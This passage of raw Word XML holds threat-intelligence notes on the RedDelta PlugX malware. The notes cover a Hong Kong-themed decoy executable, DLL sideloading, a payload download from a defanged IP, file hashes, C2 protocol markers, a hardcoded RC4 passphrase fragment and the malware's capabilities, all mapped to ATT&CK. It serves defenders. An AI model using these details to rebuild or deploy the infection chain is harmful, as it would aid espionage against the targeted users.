    <w:p w14:paraId="24E1E90D" w14:textId="49C1B287" w:rsidR="00930D08" w:rsidRDefault="00930D08" w:rsidP="00810608">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EABF2F" w14:textId="1C7F1E28" w:rsidR="00930D08" w:rsidRDefault="00930D08" w:rsidP="00810608">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7635795E" w14:textId="675BCA23" w:rsidR="00B34D84" w:rsidRDefault="00B34D84" w:rsidP="00B34D84">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>“About China’s plan for Hong Kong security law.exe” is a legitimate Windows loader for Microsoft Word that is vulnerable to sideloading. When executed, it sideloads the malicious DLL, “wwlib.dll.”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Wwlib.dll initializes the loading stage by downloading, decoding</w:t>
      </w:r>
      <w:r w:rsidR="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001834EA" w:rsidRPr="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001834EA" w:rsidRPr="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1027 : Obfuscated Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidR="001834EA" w:rsidRPr="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1140 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001834EA" w:rsidRPr="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001834EA" w:rsidRPr="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="001834EA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and executing </w:t>
      </w:r>
      <w:r w:rsidR="00E41FEC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00E41FEC" w:rsidRPr="00E41FEC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>e.g. T1059.003 : Command and Scripting Interpreter: Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="00E41FEC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00E41FEC" w:rsidRPr="00E41FEC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">an XOR-encoded Windows executable file, hk.dat, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidRPr="00A32C36">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://167.88.180[.]198/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>hk.dat. Next, wwlib.dll will extract a Word document, “About China’s plan for Hong Kong security law.docx” from its resource section and open it to make it appear to the user that a legitimate Microsoft Word document was opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64AC96" w14:textId="37DCC5F5" w:rsidR="00A96866" w:rsidRPr="00A96866" w:rsidRDefault="00A96866" w:rsidP="00A96866">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>After “hk.dat” is decoded and executed</w:t>
      </w:r>
      <w:r w:rsidR="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0039479E" w:rsidRPr="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1059.003 : Command and Scripting Interpreter: Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="0039479E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>, it will create three files in the C:\%APPDATA%/local/temp directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4167AE" w14:textId="23B48ECA" w:rsidR="00A96866" w:rsidRDefault="00A96866" w:rsidP="00A96866">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• Hk.exe (SHA256: 0459e62c5444896d5be404c559c834ba455fa5cae1689c70fc8c61bc15468681) - A legitimate Adobe executable that is vulnerable to DLL sideloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB5E35" w14:textId="2A7E9F9B" w:rsidR="00A96866" w:rsidRPr="00A96866" w:rsidRDefault="00A96866" w:rsidP="00A96866">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Hex.dll (SHA256: bc6c2fda18f8ee36930b469f6500e28096eb6795e5fd17c44273c67bc9fa6a6d) - The malicious DLL sideloaded by hk.exe that decodes and loads adobeupdate.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B0897F" w14:textId="4060629E" w:rsidR="00A96866" w:rsidRPr="00A96866" w:rsidRDefault="00A96866" w:rsidP="00A96866">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">• Adobeupdate.dat (SHA256: 01c1fd0e5b8b7bbed62bc8a6f7c9ceff1725d4ff6ee86fa813bf6e70b079812f) - The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> variant loader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BD88C" w14:textId="5B781604" w:rsidR="00A96866" w:rsidRDefault="00A96866" w:rsidP="00A96866">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Next, “hk.exe” is executed and creates copies of the files “adobeupdate.dat,” “hex.dll,” and itself renamed as “AAM Updates.exe” in the folder “C:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">\AAM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>UpdatesIIw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.” “AAM Updates.exe” </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0076617D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00CA0985">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA0985">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0076617D" w:rsidRPr="0076617D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1059.003 : Command and Scripting Interpreter: Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="0076617D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is then executed, starting the installation process by sideloading </w:t>
      </w:r>
      <w:r w:rsidR="00395E38">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00395E38" w:rsidRPr="00FD7ABE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1574.002 Hijack Execution Flow: DLL Side-Loading</w:t>
      </w:r>
      <w:r w:rsidR="00395E38">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">the malicious “hex.dll.” “Hex.dll” will decode and execute “adobeupdate.dat,” which ultimately leads to the execution </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CA0985">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>( e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA0985">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA0985" w:rsidRPr="0076617D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1059.003 : Command and Scripting Interpreter: Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="00CA0985">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> variant in memory. This use of DLL sideloading, including the use of this specific Adobe executable, aligns with recent public reporting of Mustang Panda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> use (1, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26255469" w14:textId="77777777" w:rsidR="0027690D" w:rsidRDefault="0027690D" w:rsidP="00A96866">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The C2 protocol used for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware differs from the Mustang Panda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. While both variants use the HTTP POST method common to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> including the number of “61456” in the POST header field which is a clear indicator of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST. However, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variant does not include the URI string “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>update?wd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=” more commonly associated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A4750" w14:textId="135F3B97" w:rsidR="0027690D" w:rsidRDefault="0027690D" w:rsidP="00A96866">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variant encrypts its C2 communications very differently when compared to the Mustang Panda variant reported by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Anomali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Avira. Instead of using XOR encoding, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uses RC4 encryption where the first 10 bytes of the passcode are hardcoded and the last four bytes are randomly generated and included as a key within the TCP packet so that the communication can be decrypted. The hardcoded portion of the RC4 passphrase is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>O%Pb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$.” Figure 13 shows the function where the RC4 passphrase is defined as well as where the last four bytes are appended to create the full key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DD397" w14:textId="412B297D" w:rsidR="007F11BC" w:rsidRDefault="007F11BC" w:rsidP="00A96866"/>
    <w:p w14:paraId="2FE36DE3" w14:textId="42FB7043" w:rsidR="007F11BC" w:rsidRDefault="007F11BC" w:rsidP="00A96866">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96866">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21F7B4C0" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:r>
        <w:t>[5] Notable features of this malware family are the ability to execute commands on the affected machine to retrieve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC368F3" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>machine information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5156A9" w14:textId="168B0173" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>capture the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D767D98" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>send keyboard and mouse events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCEEC8" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C216233" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>reboot the system</w:t>
      </w:r>
    </w:p>
